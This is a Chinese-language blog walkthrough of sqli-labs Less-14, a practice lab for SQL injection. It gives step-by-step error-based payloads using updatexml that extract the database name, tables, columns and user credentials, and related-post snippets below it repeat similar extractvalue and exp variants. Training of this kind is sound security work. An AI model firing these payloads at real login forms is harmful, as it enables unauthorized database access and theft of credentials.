sqli-labs/Less-14

最新推荐文章于 2024-05-11 11:41:13 发布
最新推荐文章于 2024-05-11 11:41:13 发布
阅读量165 收藏
点赞数
文章标签: 数据库 mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71299382/article/details/127928260
版权

这一关依旧是正确没有回显 错误存在回显 所以我们可以利用报错注入进行解题

首先我们输入admin" 发现报错信息 从中我们可以知道注入类型为双引号注入

所以我们进行以下输入以作证我们的想法

admin"#

显示登陆成功 只是缺乏回显

然后我们进行爆库操作

输入如下

admin" and updatexml(1,concat(0x7e,database(),0x7e),1)#

回显如下

然后继续报表操作

输入如下

admin" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1);#

 回显如下

然后进行爆字段操作

输入如下

admin" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1);#

 回显如下

最后进行爆用户名和密码相关信息的操作

输入如下

admin" and updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1);#

 回显如下

成功了!!!嗨嗨 

axihaihai
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
sqli-labs Less-14
qq_42630215的博客
03-28 309
Less-14 POST -Double Injection -Single quotes - String -with twist 与Less-13只有闭合方式不同,都是通过双注入来破解。基本步骤一致。 0x01. uname=1&passwd=1&submit=Submit uname=1"&passwd=1&submit=Submit You have ...
sqli-labs(14
jimggg的博客
03-20 251
Less-14 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入) 在password输入"会报错 "#就不报错了 那么应该是“”的闭合 但是没有回显的值 只有报错的信息,只能盲注 方法一,报错型 uname=admin" and extractvalue(1,concat(0x7e,(select data...
Sqlilabs Less-14
Light_inthe_eyes的博客
03-04 93
判断是双引号字符型注入,并且无回显,用报错注入: uname=admin"#&passwd=&submit=Submit 判断列数: uname=admin"+order+by+2#&passwd=&submit=Submit 爆库: uname=-admin"+and+updatexml(1,concat(0x5c,(select+database())),1)#&passwd=&submit=Submit 爆表: uname=admin"+and+u
sqli-labs靶场第十四关
最新发布
qq_64302290的博客
05-11 341
因为当我们输入的sql语句出错时web界面会将错误爆出来,所以我们可以使用报错注入的方式进行注入。经过我们的实验发现当我们输入的密码后面存在双引号时会报错,由此可以发现注入点在此处。通过观察可以知道最有可能存放敏感信息的表为users表,所以我们将users表的信息注入出来。我们已经注入出来了列名,现在我们将username和password注入出来。当我们输入正确的账号并在后面加上#后,可以成功登录,由此我们可以使用#进行闭合。到此我们就成功的注入了,想要注入其他的值只需要重复上面的操作即可。
sqli-labs-14
qq_53030229的博客
05-11 315
文章目录前言一、抓包、判断注入点二、判断回显字段三、获取数据库四、获取数据表五、获取字段六、获取用户名、密码 前言 摸鱼.......... 一、抓包、判断注入点 二、判断回显字段 其实这里只有两个回显字段的,我这里使用3只是为了让你们方便看 passwd=12123"order by 2--+ 三、获取数据库 uname=admin&passwd=12123"and exp(~(select * from (select database() ) a) )--+ 四、获取数据表 un
SQLI-LABS Less-13 到 Less-14
Web学习之路
03-24 109
联合注入
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好的压缩包解压到 phpstudy 的网站根目录下,例如 D:/phpstudy_pro/WWW/。文件夹名字可以自定义,但是要跟 phpstudy 中指定的域名一致,这个就是后面...
sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈
sqli labs less 14
Xiaoxiaoqiang_的博客
03-02 201
sql注入
sqli-labs ————less -14
Fly_鹏程万里
05-11 559
Less-14源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&gt..
SQLi LABS Less 14 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-21 1万+
SQLi 第十四关,SQLi-LABS Less-14SQLi-LABS Less 14SQLiLABS Less14SQLi Less 14
sqli-lab-less14
Sa1nZen的博客
08-03 58
sqli-lab-less14
sqli-labs靶场Less-14
songling515010475的专栏
08-25 109
1、访问首页,/Less-14/index.php,这里的传参点是表单中的uname、passwd 探测六步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注 2、使用报错注入获取库名 " and updatexml(1,concat(0x7e,(select database())),1) -- qwe 3、获取表名 " and updatexml(1,concat(0x7e,...
Sqlilabs-14
KAKA的博客
07-07 487
这里来到了第 14 关,题目是个忽悠,说是单引号+括号,整的跟 13 关一样但其实就是个大忽悠 在 Hackbar 上做注入,这一关 hackbar 又可以用了…这是属于哪波操作? uname=admin'&passwd=111&submit=submit 回显正常[这时你就知道题目忽悠人了] uname=admin"&passwd=111&submit=submit 回显报错[说明是双引号的人,没错了] uname=admin"#&passwd=111
sqli-labs (less11-less14)
Xi4or0uji
07-29 1495
less 11 post方法单引号绕过报错注入 这关跟之前get方法的差不了多少,只是get方法换成了post方法 post数据uname=1' union select 1,group_concat(schema_name) from information_schema.schemata#&passwd=1可以得到 uname=1' union select 1,group...
[网络安全]sqli-labs Less-14 解题详析
等风来
07-24 2301
以上为[网络安全]sqli-labs Less-14 解题详析,后续将分享[网络安全]sqli-labs Less-15 解题详析我是秋说,我们下次见。
sqli-labs/Less-28
01-09
sqli-labs是一个用于学习和实践SQL注入的实验平台。Less-28是其中的一个实验,它是基于GET请求的盲注注入漏洞。在这个实验中,我们需要利用字符串单引号和括号来进行注入。 具体步骤如下: 1. 打开sqli-labs实验平台,并找到Less-28实验。 2. 在输入框中输入以下内容进行注入: ``` ' or 1=1)# ``` 这个注入语句的作用是闭合原始查询并使其返回所有结果。 3. 提交注入语句并查看结果。如果页面显示了所有的数据,那么注入成功。 请注意,这只是一个简单的示例,实际的注入攻击可能更加复杂和危险。在进行任何形式的注入测试时,请确保已经获得了合法的授权,并且只在受控的环境中进行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

axihaihai

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值